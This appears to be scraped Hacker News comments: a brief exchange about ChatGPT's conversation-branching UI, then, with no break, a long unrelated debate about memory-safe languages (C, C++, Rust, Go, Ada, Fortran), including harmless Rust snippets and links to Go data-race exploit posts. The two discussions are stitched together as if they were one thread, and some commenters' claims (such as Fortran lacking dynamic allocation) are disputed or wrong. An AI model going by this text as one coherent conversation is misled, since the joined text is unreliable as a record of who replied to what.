
> * The main thing that makes ChatGPT's UI useful to me is the ability to change any of my prompts in the conversation & it will then go back to that part of the conversation and regenerate, while removing the rest of the conversation after that point.

Agreed, but what I would also really like (from this and ChatGPT) would be branching: take a conversation in two different directions from some point and retain the separate and shared history.

I'm not sure what the UI should be. Threads? (like mail or Usenet)


ChatGPT does this. You just click an arrow and it will show you other branches.


I have ChatGPT-4, and I have no idea what arrow you are talking about. Could you be more specific? I see no arrow on any of my previous messages or current ones.


By George, ItsMattyG is right! After editing a question (with the "stylus"/pen icon), the revision number counter that appears (e.g. "1 / 2") has arrows next to it that allow forward and backward navigation through the new branches.

This was surprisingly undiscoverable. I wonder if it's documented. I couldn't find anything from a quick look at help.openai.com.


Careful what you trust on help.openai.com. You used to be able to share conversations; now shared links are login-walled, and the docs don't reflect this. (If someone can recommend a frontend with this functionality, for quick sharing of conversations with others via a link, I'm taking recommendations. Thank you in advance.)


I have a very simple UI with threading. It's really unpolished though.

https://eimi.cns.wtf/

https://github.com/python273/eimi


Nice suggestion! Threading / branching won't be too crazy to support. I'll explore ChatGPT-style branches or threads and see which works better.


1000 upvotes for you. My brain can't compute why someone hasn't made this, along with embeddings-based search that doesn't suck.


They did make it, in 2021. https://generative.ink/posts/loom-interface-to-the-multivers... (click through to the GitHub repo and check the commit history; the bulk of the commits are at least three years old)


I bet UI and UX innovation will follow, but model quality is the most important thing.

If I were OpenAI, I would put 95% of resources into ChatGPT 5, and 5% into UX.

Once the dust settles, if humanity still exists, and human customers are still economically relevant, AI companies will shift more resources to UX.


I understand your point, but my take is that when we talk about AI and its impact, we're talking about the entire system: the model, and what is buildable with the model. To me, the gains available from doing innovative stuff w/ what we're colloquially calling "UI" exceed, by a bunch, what the next model will unlock. But perhaps the main issue is that whatever this amazing UI might provide, it's not protectable in the way the model is. So maybe that's the answer.


Their "Appendix: Memory Safe Languages" lists:

C#, Go, Java, Python, Rust & Swift


Really, the only memory unsafe languages still in use are C and C++.

If it weren't for the behemoth of legacy code we'd really have this problem more-or-less licked. Unfortunately, that behemoth is still rampaging across the landscape.

"Rewrite it in Rust" gets a bit of pushback, perhaps even justified, but at this point in time I'll take anything that just reduces that behemoth in size. The journey of a thousand miles begins with a single step, an elephant is eaten one bite at a time, etc. Rust is just one of the easier and more effective options for a legacy codebase, with the unusual advantage of being able to slip in incrementally. Almost every other language requires a true rewrite.


> If it weren't for the behemoth of legacy code we'd really have this problem more-or-less licked. Unfortunately, that behemoth is still rampaging across the landscape.

It is not only or even mostly legacy. I'm a systems programmer (in the classical sense, not "but my web service is soooo highly loaded and scalable that I will call it systems programming!") and from what I see on the job, people start new projects in C and C++ all the time.


Why do they choose C/C++? Is it just what they and their colleagues already know and nobody wants to be the one to push for change? Easier integration with other C/C++ stuff?


From my experience reasons differ for C and C++ programmers.

C programmers are often more experienced people who are used to a "simple" language that gets out of the way. They don't want to invest time into learning a tricky language like Rust, with all the intricacies of its type system, borrow checker, etc. Something simpler like Zig might work for them, but it is not on the table at the moment.

C++ programmers tend to be people who have spent hundreds if not thousands of hours learning its ugly corner cases, reading Meyers and Alexandrescu books, that kind of thing. The sunk cost is immense; their whole careers are built on being "C++ experts", and they dread abandoning it and having to learn another very complex language from scratch.

And managers often don't see value in investing time into switching projects to a new language. From their PoV it is more like programmers just want to play with a new toy instead of doing "real work".


Why are C and C++ considered the same, in these conversations?

C++ at least has tools to make life significantly more safe. I can write a buffer overflow in any language, and on the scale of difficulty, ASM-C-C++-Rust-Python covers my experience (from easiest to fuck up to hardest).

Yet nobody is calling for us to rewrite everything in python. Why is the line drawn at Rust? It's perfectly simple to trash memory in Rust.


Because "significantly more safe than C", while true, is also irrelevant. I want safe, not "safer than grotesquely unsafe". Unfortunately, for all the advances C++ has made, it is still in the "unsafe at any speed" class. It is difficult to escape the foundation of unsafety the entire C++ edifice rests on.

(At least, without further support. I consider "C/C++ with high quality static analysis" to be de facto distinct languages, and while I would favor something else even so, high-quality use of a high-quality static analyzer is enough to calm me down. Things have still crept through that level of care, but then, interpreters and compilers for safe languages have had safety errors in them before too.)

This is particularly true because it's just C and C++ that are memory unsafe. If we were still in 1980, we could be arguing about the gradients of unsafety, but in 2023 we don't need to. Unsafety is not necessary at scale.

As for why people aren't asking to rewrite in Python, I partially answered that in my post. You can actually incrementally rewrite in Rust. You can't incrementally rewrite software in Python. There is also plenty of software that can be written in C, but simply can't be written in Python because it would be too slow. (Rewriting it in Python but oh no wait I'll just write the slow bits in C is a no-op, practically.)
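To make "incrementally rewrite in Rust" concrete: the usual path is through the C ABI, where a single function gets rewritten in Rust and exported so the existing C callers never notice. A rough sketch (the checksum function and its signature are invented for illustration):

    // Drop-in Rust replacement for one C function; the rest of the C
    // codebase keeps calling checksum() exactly as before.
    #[no_mangle]
    pub extern "C" fn checksum(data: *const u8, len: usize) -> u32 {
        // SAFETY: the C caller promises `data` points to `len` readable bytes,
        // the same (unchecked) contract the old C implementation relied on.
        let bytes = unsafe { std::slice::from_raw_parts(data, len) };
        bytes.iter().fold(0u32, |acc, &b| acc.wrapping_add(u32::from(b)))
    }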

As for trashing memory in Rust, by perfectly reasonable convention we generally understand that unsafe is unsafe, and that while languages can't avoid having it, having it does not necessarily make the entire rest of the language just as bad as C. I can crash Haskell with a straight-up, genuine null pointer exception with the Unsafe module in a single line of code. We do not thereby call Haskell an "unsafe" language where it is trivial to trash memory. Stock Rust is far safer than C++, to the point of being not only a qualitative change, but I'd contend, multiple such qualitative changes.


Separating safe C/C++ from everyday C/C++ is not fair, in my opinion, but I get your point: If it can be abused it will be, either by accident, inexperience, or maliciousness.

Once you separate C/C++ into safe and unsafe categories, and admit that Rust has unsafe uses that are "just so much harder to use", we're clearly defining a gradient:

    C/C++, safer C/C++ subset or maybe Unsafe Rust, safer Rust, ...


Sure, you can write safe C++ with some effort, but the libraries you use most likely still contain unsafe C/C++. For Rust, I expect that the libraries are much safer in general.


Rust is memory safe by default, with unsafety as an optional feature that you basically never need to use unless you’re writing extremely low-level code, need absolute maximum performance, or are interfacing with libraries written in other languages.

C++ is unsafe by default.

Of course it’s just as easy to write bugs in unsafe Rust as it is in C++ (actually, it’s probably even easier), but defaults matter.
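A tiny sketch of what "defaults matter" means in practice: the checked path is what you get by writing the obvious thing, and the unchecked path has to be spelled out.

    fn main() {
        let v = vec![1u8, 2, 3];

        // Default: indexing is bounds-checked; v[10] would panic, not corrupt memory.
        let checked = v[2];

        // Skipping the check requires an explicit `unsafe` block.
        let unchecked = unsafe { *v.get_unchecked(2) };

        assert_eq!(checked, unchecked);
    }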


This is a common view, and I agree up to a point. However, interfaces matter. At the interface to _literally any_ system call, unsafe starts to creep out. Either in the wrapper implementation, or in the interface _to_ the system, or even leaking through the wrapper to the caller.

At that point, if we have to re-wrap everything in rust to hide the unsafety of the interfaces to the system (sockets, shared mem, etc etc), then why not just write safe cpp wrappers?

Yes, people are writing memory overflows in their own code, but I'd argue 99% of the critical security bugs are actually in the unsafe interfaces. And we don't really need a new language to fix that. We just need new interfaces.

I love Rust, but using it for anything nontrivial makes the "safe" patina really fade. You're quickly writing what feels like C, with MaybeUninit<X> all over.


> At the interface to _literally any_ system call, unsafe starts to creep out. Either in the wrapper implementation, or in the interface _to_ the system, or even leaking through the wrapper to the caller.

It’s quite rare to have to make syscalls directly in Rust, just like it is in c++. Most code in any large enough system is related to the internal logic of the system, not to its interface with the outside world. And when you _do_ need to interface with the outside world, you can use a wrapper (lots of the standard library is basically wrappers around syscalls; this is true in any language). And no, in Rust unsafety doesn’t typically “leak through” interfaces, unless those interfaces are buggy.

> why not just write safe cpp wrappers?

There’s no such thing. It’s not possible to write a safe interface to c++ code in the sense that that term is used by the Rust community. In Rust, “safe interface” means: assuming there are no bugs in the underlying code, and the client code never invokes `unsafe`, using the interface cannot cause undefined behavior. This is impossible to guarantee in c++.
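As a sketch of that definition (assuming the `libc` crate for the extern binding): the `unsafe` lives inside the wrapper, and the function can be exposed as safe only because no argument from safe code can violate the callee's preconditions.

    // Safe wrapper around an unsafe FFI call: getpid takes no arguments,
    // cannot fail, and touches no caller-owned memory, so there is no
    // precondition a safe caller could possibly violate.
    pub fn current_pid() -> libc::pid_t {
        unsafe { libc::getpid() }
    }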

> I love Rust, but using it for anything nontrivial makes the "safe" patina really fade. You're quickly writing what feels like C, with MaybeUninit<X> all over.

This is not true at all in my experience. I work on Materialize, surely one of the more non-trivial Rust programs that exists. We use very little unsafe/MaybeUninit/C-like code. Do you have an example of a codebase you’re thinking of that does this?


And that's the problem: I do have to make syscalls directly quite often, so I dislike Rust immensely. There are literally dozens of us, at least, but the people talking about Rust on the internet always like to drag C into the conversation for whatever reason, even though they are always C++ programmers.


That's fair! If you are doing something low-level enough that the bulk of the work is interfacing directly with a C library (or with the kernel, in the case of syscalls) then C might make more sense than Rust.


OK this is reasonable. Perhaps my experience skews towards the lower-level a bit too much. And it's also reasonable I'm misusing the language given it's not my day job.

To answer your question, I'm referring to much of the networking code in socket2 / socket, which uses MaybeUninit when doing non-standard stuff like forming your own packets (raw sockets).


Yep, I definitely buy that if you're doing very low-level stuff, C or C++ might be more ergonomic than Rust. But I don't think that covers most of the real-world use of C++.

I'm not too familiar with `socket2` but normally in Rust to construct a buffer with arbitrary bytes in safe code you would first zero it out and then write it. Using `MaybeUninit` there is presumably just a micro-optimization to avoid having to memset things to zero.
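Roughly, the two styles look like this (a sketch, not socket2's actual API): the safe version pays for one memset up front, while the `MaybeUninit` version skips it in exchange for an unsafe obligation.

    use std::mem::MaybeUninit;

    fn main() {
        // Safe: zero the buffer, then overwrite the bytes you care about.
        let mut buf = vec![0u8; 1500];
        buf[0] = 0x45;

        // Micro-optimized: skip the zeroing; now *you* must only read back
        // bytes that were actually written.
        let mut raw = [MaybeUninit::<u8>::uninit(); 1500];
        raw[0].write(0x45);
        let first = unsafe { raw[0].assume_init() }; // asserts byte 0 is initialized

        assert_eq!(buf[0], first);
    }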


C++ makes it very difficult to write safe interfaces. You can't expose references, nor spans, nor variants, no shared_ptrs to things that can't be thread-safely overwritten, nor any standard library containers nor a lot of other things. And even if you only use whatever few interfaces remain safe, the interfaces you create are unsafe by default too. As a result, these unsafe interfaces are everywhere.

I'd contend that using Rust for anything nontrivial results in MaybeUninit & co being common.


I feel I have to disagree with your (implied) contention that it's feasible to write an API in C++ that, no matter what its inputs are, cannot ever exhibit undefined behaviour.

Because that's what "safe" in Rust means. No memory safety errors, no undefined behaviour.


Who operates crates.io?


It’s owned by the Rust Foundation.


No, I've seen libraries that need the user to use unsafe by default. The wgpu library is one example. It's not even that low-level. Rust stuff is a little too safe, to the point that it influences code organization and modularity as well.


People are calling for the use of languages like Java or Python when it is appropriate. Rust is just specifically mentioned (along with Swift, to some degree) when it comes to applications that have a couple of fundamental requirements that prevent the use of other languages. These might be requirements like no pausing for GC or the ability to run without a VM.

Rust (and Swift) are viable languages for solving most problems that people usually reach for C or C++ to solve today and both make it considerably more difficult, by default, to introduce the most common class of serious security vulnerabilities in the modern world.


I don't think C and C++ are that different. I agree that C++ gives you tools to make safer abstractions, but it still gives you few tools to enforce those abstractions. For example, std::shared_ptr being easy to use is a great improvement, as in many cases you can just use it rather than trying to prove that you don't need it, so that you don't need to bother implementing your own reference counting.

In C++ vec[999] is a buffer overflow and you can index any pointer even if it isn't supposed to be an array. There are so many easy mistakes that can be made and aren't obvious to a reviewer. Maybe with a very strong linter you can consider C++ very distinct from C, but by default I don't think it is that different.

> I can write a buffer overflow in any language

Try doing it in JavaScript? If so, the Mozilla security team would appreciate a private disclosure. Of course it is possible in any non-sandboxed Turing-complete language, but there is a huge difference between the default accessor of the most-used container type allowing it vs. needing to use methods of the `sun.misc.Unsafe` class or wrapping your code in an `unsafe` block. Making code that may cause a buffer overflow explicit is a night-and-day difference. It means that you can't do it via a typo in the vast majority of your code, and it will grab the attention of your reviewer very quickly. Isolating the code that can cause buffer overflows to a small part of the program greatly raises the attention given to those areas, and greatly reduces the chance of them occurring.

I don't think that Java or Rust prevent all buffer overflows, but I also don't think that it is possible to write C or C++ without them. Sure, it is possible to be careful and avoid most of the buffer overflows most of the time, but we and our reviewers are just human so we will never prevent all of the buffer overflows all of the time.

I don't think that this recommendation is under the impression that "memory safe languages" will prevent all buffer overflows, but the idea is that they will greatly reduce the number. In many situations, I would guess the majority of them, this is a good tradeoff.


> It's perfectly simple to trash memory in Rust.

What makes you think so? Most Rust programmers, and programmers from other languages, agree that this is not possible. I might be missing something, but can you give an example of such a simple way to trash memory in Rust? Asking from a curiosity standpoint.


I would assume they mean through the use of unsafe, which is true, but in practice unsafe code is less common than people who don't write Rust seem to think, and tools like Miri help a lot with writing unsafe code that doesn't write to memory locations it wasn't meant to.


Perhaps they aren't writing Rust because those are the people that need to write unsafe code. Chicken and egg. I'm sure if you forced all the C programmers to switch to Rust you would see a lot more use of unsafe.


But there are plenty of projects out there that are written in Rust and have to deal directly with hardware and syscalls. Hubris, a kernel written in Rust has 94 files referencing unsafe[1] out of 414 total .rs files[2]. This is as "bad" a ratio as you're gonna encounter in a project. There are many valid reasons one can have to not use Rust. "I need a lot of unsafe" is not really one.

[1]: https://github.com/search?q=repo%3Aoxidecomputer%2Fhubris+un...

[2]: https://github.com/search?q=repo%3Aoxidecomputer%2Fhubris++l...


I don’t think most Rust programmers agree it’s impossible at all.

There’s always unsafe. I can make a pointer to anywhere by hand and write to it. That would involve some very intentional work, but I could do it if I wanted to.


There's a difference between "chamber a round, remove the safety, aim at the foot, shoot" and "open the kitchen faucet, leg gets blown off".


Yes of course. But the GP said it isn’t possible. It is. It’s not even hard.

But I did disclaim that it had to be somewhat intentional.


> I can write a buffer overflow in any language. ... It's perfectly simple to trash memory in Rust.

Not in safe Rust.


You're more right than wrong, but I want to push back just a little. You can write a buffer overflow in safe rust if you store multiple things in the same array and work with indices rather than slices. Of course the risk is bounded by what shares an array, and it's more awkward than doing it any of several right ways. You won't write a buffer overflow in safe rust... but you can if you want to.
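A sketch of that failure mode, with a made-up layout and no `unsafe` anywhere: two logical records share one allocation, and a bad length lets one overwrite the other without tripping a bounds check.

    fn main() {
        // Bytes 0..8 are "record A", bytes 8..16 are "record B".
        let mut arena = vec![0u8; 16];

        let bad_len = 12; // should have been <= 8
        for i in 0..bad_len {
            arena[i] = 0xff; // stays inside the Vec, so no panic...
        }

        // ...but record B has been silently clobbered.
        assert_eq!(&arena[8..12], &[0xff; 4]);
    }

The damage is confined to that one allocation, which is the "bounded by what shares an array" caveat above.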


This is a bit like saying "you can write a buffer overflow in any turing-complete language, because you can write a C emulator, and then write the buffer overflow in C"


A bit, but in that case the buffer overflow is arguably still "in C" in a way that it isn't in my example.

As I said, you won't write a buffer overflow in rust, but unpacking why can be interesting and it doesn't end at "bounds checks".


> Why are C and C++ considered the same, in these conversations?

Conjunction is not equality. They are both memory unsafe. Then you can argue from that over how memory unsafe they are in practice (using the right practices, using the right language subset).


What I don't understand is the excitement for using Rust vs. using garbage collected languages like Golang, at least for high-level applications (performant or low-level systems applications are excepted here.) My experience is that an experienced programmer can be a lot more productive quickly with Golang, since they don't need to climb the Rust borrow-checking learning curve. Rust doesn't even free you from the need for a runtime or standard library.


> My experience is that an experienced programmer can be a lot more productive quickly with Golang, since they don't need to climb the Rust borrow-checking learning curve.

Will somebody please tell me why everyone seems obsessed with optimizing for programmers going from zero to minimally productive?

I have been using Ruby for twenty years, Rust for eight, golang for nine, and C for twenty-six. Most programmers will use a language for dramatically longer than a year, so why are the first three months such a singular point of focus?

The code I wrote in the first three months of using every one of these languages was bug-ridden, unidiomatic, unnecessarily difficult to maintain, and generally terrible. Ironically, Ruby was probably the least bad in this regard. Go and Rust were probably about the same, but I'd frankly give Rust the slight edge here. C was inarguably the worst, but it was also my first language.

Subjectively and retroactively comparing things a year in, I’d wager my Rust was of the best quality (readability, ease of maintenance, speed of development, bugs per “unit of functionality”), followed by Go, Ruby, and then C. At five years, the quality of my Rust code blows everything else out of the water. My C was still terrible (partly because it was C, partly because it was still my first language). But I’d say Ruby edged out Go at this point for me.

Obviously this is not only anecdata but wildly guesstimated looking back and comparing learning curves on languages at completely different points in my experience as a programmer. I’ll happily admit that Rust pulling so far ahead so quickly is as likely to do with it building off the knowledge of prior decades of professional software engineering. And that my personal experience with any of these languages is of course unique to me and my circumstances.

But it just seems wild to me that people seem to focus on “getting a new person up to speed as fast as possible” to the exclusion of apparently everything else.


Conversion friction. Very important. Arguably the reason why Haskell is not 10-100 times more popular than it currently is; the conversion friction is just too much, and even if all the tooling was perfect and the libraries were perfect and the documentation was perfect it would still have too high a conversion friction to attract a community the size of Go or C# or something.


I can sympathize somewhat with this argument. But it’s also kind of circular to me.

Go being easy to pick up and learn is certainly a virtuous cycle insofar as it helps bootstrap a large community. And that’s absolutely happened!

But that is—in my mind—more of an explanation for why Go has become so popular so quickly more than it is a compelling argument for the language itself. Haskell having conversion friction might explain its lack of adoption, and that’s certainly a great argument in a discussion about why or why not to adopt it for yourself or your team! But it seems like an overvalued axis on which people seem to evaluate languages on their own.

As a counterexample: PHP classically had a reputation as being a language that was very easy for beginners to pick up. And it's even memory safe! But it also had a reputation for having poor long-term prospects for projects written in it, as well as being a limiting factor in the growth of engineers using it (note: I make no claims as to the fairness of this reputation, nor to its applicability to "modern" PHP).

PHP is arguably even easier to learn than Go. So why is it that virtually nobody jumps in these discussions trumpeting that?


From the article: "In contrast, Rust's explicitness in this area not only made things simpler for us but also more correct. If you want to set a file permission code in Rust, you have to explicitly annotate the code as Unix-only. If you don't, the code won't even compile on Windows. This surfacing of complexity helps us understand what our code is doing before we ever ship our software to users."

https://vercel.com/blog/turborepo-migration-go-rust
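For anyone who hasn't seen the pattern the article is describing, it looks roughly like this (the helper name is made up):

    use std::fs;

    // Unix-only: the PermissionsExt trait simply doesn't exist on Windows,
    // so forgetting the cfg gate is a compile error there, not a silent no-op.
    #[cfg(unix)]
    fn make_executable(path: &str) -> std::io::Result<()> {
        use std::os::unix::fs::PermissionsExt;
        let mut perms = fs::metadata(path)?.permissions();
        perms.set_mode(0o755);
        fs::set_permissions(path, perms)
    }

    #[cfg(unix)]
    fn main() -> std::io::Result<()> { make_executable("build.sh") }

    #[cfg(not(unix))]
    fn main() {}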


I’m writing a sibling comment to answer the parent’s question directly rather than the meta-argument from my original reply.

> What I don't understand is the excitement for using Rust vs. using garbage collected languages like Golang… since they don't need to climb the Rust borrow-checking learning curve.

Because, in my experience, climbing that learning curve has made me a better programmer more than nearly any other change in my long career. And that benefit has extended to code in every language I write.

The borrow checker isn’t just some hurdle to get in your way; it’s trying to tell you (awkwardly at times and perhaps less helpfully than one would wish) something fundamental about the way you think about and design programs. Internalizing that lesson can bring significant benefits on designing systems with clean boundaries that are easier to test, easier to reason about, and easier to compose.

Besides that, Rust greatly assists you (through features other than the borrow checker) in building software that is correct. This means it will tell you in a much wider variety of scenarios when future code invalidates previous assumptions. This is invaluable for projects that we expect to survive for a long time since the time a project is maintained will dwarf the time it’s under active development. And it will almost certainly be maintained by someone without the full context of the original developer(s). This is true even if the maintainer is the same person who wrote it in the first place, since our mental model of a program bitrots far faster than the program itself.

In practice, this aligns with my personal experience. Go projects end up with a lot of implicit assumptions that are silently violated by future work and expose bugs. They crash on nil pointer derefs. They accrue a multitude of linting tools that usually paper over some of the language’s shortcomings, but only in common cases. And they become painful to maintain as the original developers move on to other projects, with new changes grafted haphazardly into dozens of touch points instead of cleanly in one or two places. Yes, you can “easily” follow what any particular function does, but to do so you have to parse out and mentally model every minute detail, rather than being able to reason at a high level.


>Rust doesn't even free you from the need for a runtime

I always thought that Rust was the only memory-safe language that doesn't need a runtime (beyond the libc that every language links to when running on Unix-like OSes). Maybe you could define what you mean by runtime.


> Rust doesn't even free you from the need for a runtime or standard library.

Could you elaborate on this? Rust doesn't have a runtime (beyond what C has), and I'm having trouble understanding what you meant to say about stdlibs.


Rust certainly performs runtime bounds-checking as well as some other tasks, so there is runtime code (even if it's just compiled into executables.) If you want features like async (standard in many language runtimes) you're also going to have to pull in some kind of external runtime dependency. And everyone doing high-level web-style development seems to drag in something like tokio.
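For example (a minimal sketch assuming the tokio crate as the executor): the language provides `async`/`.await`, but nothing actually runs a future until a library-supplied runtime polls it.

    // Cargo.toml (assumed): tokio = { version = "1", features = ["full"] }

    #[tokio::main] // the executor comes from a crate, not from the language
    async fn main() {
        let fut = async { 21 * 2 }; // a future is an inert value...
        println!("{}", fut.await);  // ...until the runtime polls it
    }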


> Rust certainly performs runtime bounds-checking as well as some other tasks, so there is runtime code (even if it's just compiled into executables.)

I don't think I've ever seen anyone reference "C with bounds checks enabled" as "having a runtime". Does having stack probes also imply having a runtime? I guess I'd be less surprised if it had been worded as "some mitigations/features have a runtime cost".

> If you want features like async (standard in many language runtimes) you're also going to have to pull in some kind of external runtime dependency.

Yes, you can add a runtime to your application (if you need to use async/await). It has an additional cost over not doing that, but the "promise" is that it is "zero (additional) cost (over what you'd end up with if you wrote the functionality by hand)".


For sure C programs have a runtime. I'm debugging an issue right now that is to do with Windows not shipping VCRUNTIME140_1.DLL on out-of-the-box or old versions of Win10, so in that case it's very clear because you can make C programs that won't start due to a missing runtime library.

The runtime isn't all that large but every OS has one. On UNIX it's spread over libc, libpthread, libgcc, libm and so on.

On Linux stack probes usually have some support code in libgcc and/or glibc, if I recall correctly.


That's a rather idiosyncratic definition of "runtime"


(not the parent) You're not wrong but you're not right either. There's basically a colloquialism where many developers say "runtime" to mean "large runtime" and "no runtime" to mean "small runtime," but that doesn't mean that crt0, the "c runtime starting from zero", doesn't exist, just that we've ended up in a place where this gets confusing to talk about because nobody uses the same definitions.

So if it's idiosyncratic really depends on what audience you're talking to.


It's the correct definition and I don't know of anyone familiar with OS design that would claim C doesn't have a runtime. It very much does. So does C++. Every language does, except assembly.

It may feel like C doesn't have a runtime if you're only familiar with UNIX, because the C runtime is guaranteed to come with the OS there whereas other language runtimes are optional and thus more visible. But every language has a runtime.


People writing C are the people that really do have to make syscalls directly, or use weird calling conventions, or whatever all the time. I see Rust replacing C++ but I have a hard time seeing it replace C because the people that desired and/or could tolerate safety, like you said, are already not writing C for the most part. That group has been firmly C++ for a long time.


> People writing C are the people that really do have to make syscalls directly,

Not really. See for example desktop Linux (i.e. Gnome).


>Really, the only memory unsafe languages still in use are C and C++.

Ada, Fortran, assembly?


Fortran does not end up where I'm too worried about its security. C and C++ do. At the scale I'm talking about, I'm not sure we'd even say Fortran is "in use".

Assembly is in use, yes, but in 2023 I feel there is generally an understanding of the risks, and I haven't seen the "write everything in assembly" crew in about 15 years. The problem is that there are still too many programmers blithely using C and C++ without realizing the risks and thinking they can cowboy through the problems. For every line of vulnerable, dangerous assembly I bet there are thousands of lines of C or C++.

There is also the problem that there have been some big bugs that got through even static analysis and fuzz testing, but I'd still be at least reasonably satisfied if all the critical software in C and C++ would be supported by those tools. Interpreters and compilers have had non-zero error rates too.

At the scale I'm talking about, Ada is a non-entity as well. It isn't used. "But it is! I'm a professional Ada programmer!" says someone reading this to themselves. In which case I would say, you darned well know what I mean and don't pretend otherwise just to try to score useless internet points. Ada is not a relevant force on the programming world. That may be sad, but it's true.


SQLite is able to carry most of the justification for C itself at this point.

Duplicating the DO-178B certification that it has obtained in an endorsed language will be an incredible burden for any who attempt it.


Ferrocene has said in the past they plan on going for DO-178 in the future.


But we do not plan on rewriting SQLite, that much I can say :)

(My reading is that the GP is pointing to the exemplary achievement of SQLite reaching a close-to-bug-free state, security-wise, at what I consider a nearly superhuman effort.)


That's a good point, I certainly didn't mean to imply that you were!


Objective-C?

Plus everything that needs to directly interface with the above languages. So many Python libraries that are one "funny integer" away from a nightmare debugging session.


Fortran is probably as bad as C, and Ada isn't truly memory safe - they link to Ada/Spark, which is, but that doesn't seem to have much widespread use.

https://www.adacore.com/about-spark


Isn't Ada/Spark in avionics the main use case for Ada these days? So, huge share of a tiny market?


> Isn't Ada/Spark in avionics the main use case for Ada these days?

Hasn't it always been? I'm no expert but always assumed that it was used basically in military and avionics, and perhaps other safety-critical equipment.


I think it's also used in high speed rail.


Also weapon systems.


Fortran is used for scientific computing. The chance of crashing a run on someone's Beowulf cluster is high, but the severity is low.


Fortran doesn’t even have dynamic memory allocation, so it’s inherently safe.


It actually has had this since Fortran-90, and there's even a 'pointer' keyword.


https://www.ibm.com/docs/en/xffbg/121.141?topic=attributes-a...

No direct pointer arithmetic, though. If you allocate the memory via allocate, you can inquire whether it's been deallocated.


Isn't Ada memory-safe?


Ada isn't, Ada/SPARK is. That's a subset of Ada, and while it is the main draw of the language for new projects the majority of extant Ada code predates SPARK.



In summary, Ada tries to be memory safe by default -- as far as that can be done without requiring automatic memory management and garbage collection -- but deliberate use of "unchecked" language features can break memory safety.

In other words, if you go out of your way to use unsafe features, and don't use the features that compensate, Ada is memory unsafe. This has become the go-to dismissal of Ada, apparently more popular than "eww...a BEGIN..END language" and "designed by committee/government tainted".


But other languages use C++. R, for example, is widely used and has a ton of packages where people write often-buggy C++.


Rust is a little too safe, IMO. I want a Rust with just shared pointers and no move semantics. I guess Go would be it? But Go is too opinionated, with a bunch of stupid Go-specific philosophies like the weird error handling and the stupid packaging rules.

Go is also opinionated about concurrency. So that's an issue too.


Ocaml then?


I like functional, but this isn't what I'm referring to. OCaml, by being functional, is opinionated.


It's unfortunate that there's no mention that not all these languages are equally safe.

Go isn't memory safe when using goroutines. See: Golang data races to break memory safety: https://blog.stalkr.net/2015/04/golang-data-races-to-break-m...


That's fine. Safety with concurrency doesn't exist in any language. Only Rust is special in that it tries to provide safety with concurrency as well. I haven't seen any other language besides Rust actually do this.

The reason is obvious. There's a high cost to this type of safety. Rust is hard to use and learn, and many times its safety forces users to awkwardly organize code.

And there's still the potential for race conditions; even though the memory is safe, you don't have full safety.
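To make "safety with concurrency" concrete, a minimal sketch: shared mutable state has to be wrapped before the compiler lets two threads touch it, and that is enforced without any `unsafe`. (Higher-level race conditions and deadlocks are still on you, as noted.)

    use std::sync::{Arc, Mutex};
    use std::thread;

    fn main() {
        // Handing a bare `&mut u64` to several threads would not compile;
        // Arc<Mutex<..>> is the price of admission.
        let counter = Arc::new(Mutex::new(0u64));

        let handles: Vec<_> = (0..4)
            .map(|_| {
                let c = Arc::clone(&counter);
                thread::spawn(move || *c.lock().unwrap() += 1)
            })
            .collect();

        for h in handles {
            h.join().unwrap();
        }

        assert_eq!(*counter.lock().unwrap(), 4);
    }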


Swift provides memory safety with concurrency as well.


It's not safe when using goroutines to access shared mutable data (and most Go code does this). If you stick to message passing a.k.a. "share data by communicating" you don't run into memory unsafety. But this kind of design is more vulnerable to other concurrency issues, viz. race conditions and deadlocks.


Go is memory safe; that post does not mean anything in a real-life scenario.

Do you have a single example in the last 14 years of a memory safety exploit using the Go runtime? I'm talking about public, known exploits, not CTFs and the like.


The same author has a post from 2022 [1].

> Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes!

Whether it's capture the flag is irrelevant, IMO, because anything that's allowed by the compiler will emerge given enough complexity.

1: https://blog.stalkr.net/2022/01/universal-go-exploit-using-d...


Wow, that's super interesting. As you say, it's a contrived CTF example, but I'm pretty shocked that it's possible to read and write arbitrary process memory without importing any packages (especially unsafe, of course).

I'm also surprised that a fix has been theorized at least as far back as 2010[1], but not implemented. Is adding one layer of internal pointer redirection for interfaces, slices, and strings really that much of a performance concern?

[1] https://research.swtch.com/gorace


Go was released in 2009 and I've never heard about any exploit or whatnot. By the way, this is known and by design; it's not new. It's all about the multi-word representation of interfaces.

I mean, if in 14 years there was nothing, that's proof it's not an issue.

Even the attacker acknowledges that it's not a threat.

"As said before, while a fun exercise it's pretty useless in the current Go threat mode"


How long was OpenSSL in use before we discovered Heartbleed?

Or Bash before Shellshock?


Adding some more for other languages:

* Many GC'd languages like Go, C#, and Java make it harder to leak memory, while in languages where reference counting is more prevalent (Python, Rust) it can be easier to leak memory due to circular references.

* Languages with VMs like C#/Java/Python may be easier to sandbox or execute securely, but since native code is often called into it breaks the sandboxing nature.

* Formally-verified C code (like what aerospace manufacturers write) is safer than e.g. Rust.

* For maximum safety, sandboxing becomes important - so WASM begins to look appealing for non-safety-critical systems (like aerospace) as it allows for applying memory/CPU constraints too in addition to restricting all system access.


You can also cause a segfault in Go by dereferencing a null pointer. That's another example of not being entirely memory safe.


In this case it's not memory unsafe. It is guaranteed to crash the program (or get caught). It's closer to a NullReferenceException than it is to reading from a null pointer in C. There's no memory exploitation you can pull off from this bug being in a Go program, but you could in a C program.


It's only guaranteed because of the operating system's sandboxing.

> It's closer to a NullReferenceException than it is to reading from a null pointer in C.

No, it's exactly the same as a null pointer dereference in C, because it is literally reading from a null pointer in Go as well. In Java, the compiler inserts null checks before every single dereference and throws an exception for null references.

> There's no memory exploitation you can pull off from this bug being in a Go program, but you could in a C program

Provided the OS sends a SEGV signal for null pointer dereferences, I don't see there being a difference in security between C and Golang in this respect. It's a bigger problem when you're running without an operating system.


In a huge number of cases the null dereference is not from accessing 0x0 but some offset from it (i.e. accessing a struct member or array element that's not the first one). Of course, in practice most of the offsets are below the limit where nothing is ever mapped (on Linux, vm.mmap_min_addr, which seems to be 64k by default for me), but it's still very possible for such a dereference not to segfault in C. That should not be possible in Go/Java (if it is, it would almost certainly be considered a bug in the compiler/VM).


Why isn't it possible in Go? If you can use pointers to structures in both Go and C, and you can access the fields of a structure through a pointer in both, then I don't understand why reading a structure field through a null pointer wouldn't cause the dereference of an address like 0x8 in both languages.


Unbounded/large offsets are the critical part. The minimum unit where memory protection can be set is one page (4096 bytes on x86), so the compiler could reasonably assume that offsets 0-4095 are always safe to dereference without a NULL check (in the sense that SIGSEGV is guaranteed, which can then be turned into a NullPointerException in the SIGSEGV signal handler). For anything larger, or for array accesses, add an explicit check for NULL before the dereference.


